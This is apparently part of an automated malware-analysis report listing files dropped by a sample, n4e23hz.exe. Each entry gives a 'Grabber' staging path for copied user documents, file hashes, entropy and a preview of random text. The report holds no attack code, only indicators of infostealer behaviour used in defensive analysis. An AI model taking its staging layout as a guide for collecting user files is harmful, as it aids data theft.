Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Documents\UMMBDNEQBN\JSDNGYCOWY.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690895772725941
Encrypted:	false
SSDEEP:	24:ZTWQe0oC6OG/K8Vsypd0HuXw0xVfU/Vzv98UU:ZTWQr2VyXysHIwcGKUU
MD5:	A002E80B55673139253599B753BDC01A
SHA1:	6AEEF831A5AAB9155AAABB52D173859E20A86932
SHA-256:	F3484FA4E615D7134AC1BF4C3355C6AD63B32AC3CD096345C5EBF6B0CE6669A0
SHA-512:	D4A9257255BA4610E904C005F6734E65D5B0B4489E645792F3AB52AFD59B4B76E4B0FCE1F3457D7E5D3DA3101DAAC80A926FA513B77DAB01F2DAC5F5C4304CA7
Malicious:	false
Preview:	JSDNGYCOWYHKSOWFGCIERRTFYJMLBLSAMTEZRBUWFRXYICIUHZNIMVLJXTFXQNXACRFWSEWJBERQHLEBPYXRECCWDJKIIOUGNYQMGAHSLOPLLALAEDDKJTOOCDGYIBOWZZREIEWSXQRGULZIXFYNIUMNTNALWVABHVLKEJLBKGOKXZWDSWRTTLTQLNTZDYMSECYMQISNCNIAJOWDCCMHWLIVFACQKZXXZJOSENBJHZELIVOCAHDNZGZILFSILTSAJXDBFAIPHVHXYHJHVMVHKVOMYOGGVIKVJUVYLDFTICBCZKSVRDRTALSXFNMCPLGOGSEBKXSHSHVDVDKWEHNIBLPTMWICAACVFWPQNIUVLFSAWPOGDJFOGTXDHMTFWREVZXCABJCKFYXJGAHKTXNFLIILTMBRTKACTMOVDBLCVYDVLNCDXAAINTGCCRZPDTOFCWZWTHLCVGRTQPEBHUFYWLTLNUIOFLOUTCINZEJUVLTZPPDBVDEELCGFQSGJPRJBEALQLZQAYAQRUTUANCYUZJENWEIISDNULLJXJUPBQHEJEUVMKMEUQRDHXPAZVIFDUGNWXKXYWIQQNJNRMYCLJLHWESVCNCQSXILKRQFSYEDZSBHSLAYIWWOVRVVSWUFEAQPMAPAKFCXFBDIPKHPSFGVOJCEEBALPVQKECBBUCTQGQXOQAPOOYAPYQXNDLKJDRFQDILPIWRGDYTFUHSZLJICMMUSSHGHNLKNEDYXJSPECVTAEQTVXATOODAVROWNAPCHDRRBHVDVWBGOSCJGDENAGFCYDIHAPBWLJNOPCQCPTSOHGQQMHEAKRBOBSEHAOMGXJVYWJGLSIQJUOMYPNZTOFVNNMRIVMHOCFZTLTEDAGEXGJXLNRLSHJQGFHIJDLJHOPPMFPYEIXPRQCTRDIYDJEHHSKFBRZMXLZJBDDOYCXQJBCBQFRXVCYCHXKGNDWEEUUKPAGVHHOXFZXZEWWCOVSFYZHILZJQQKFHCLR

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Documents\UMMBDNEQBN\UMMBDNEQBN.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Documents\UMMBDNEQBN\WUTJSCBCFX.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.688284131239007
Encrypted:	false
SSDEEP:	24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
MD5:	E8ACCA0F46CBA97FE289855535184C72
SHA1:	059878D0B535AEE9092BF82886FC68DC816D9F08
SHA-256:	CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
SHA-512:	185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
Malicious:	false
Preview:	WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Documents\VLZDGUKUTZ.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Documents\VLZDGUKUTZ.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Documents\VLZDGUKUTZ\DVWHKMNFNN.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Documents\VLZDGUKUTZ\KATAXZVCPS.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Documents\VLZDGUKUTZ\NWTVCDUMOB.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Documents\VLZDGUKUTZ\VLZDGUKUTZ.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Documents\VLZDGUKUTZ\YPSIACHYXW.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.700014595314478
Encrypted:	false
SSDEEP:	24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
MD5:	960373CA97DEDBA8576ECF40D0D1E39D
SHA1:	E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
SHA-256:	501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
SHA-512:	93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
Malicious:	false
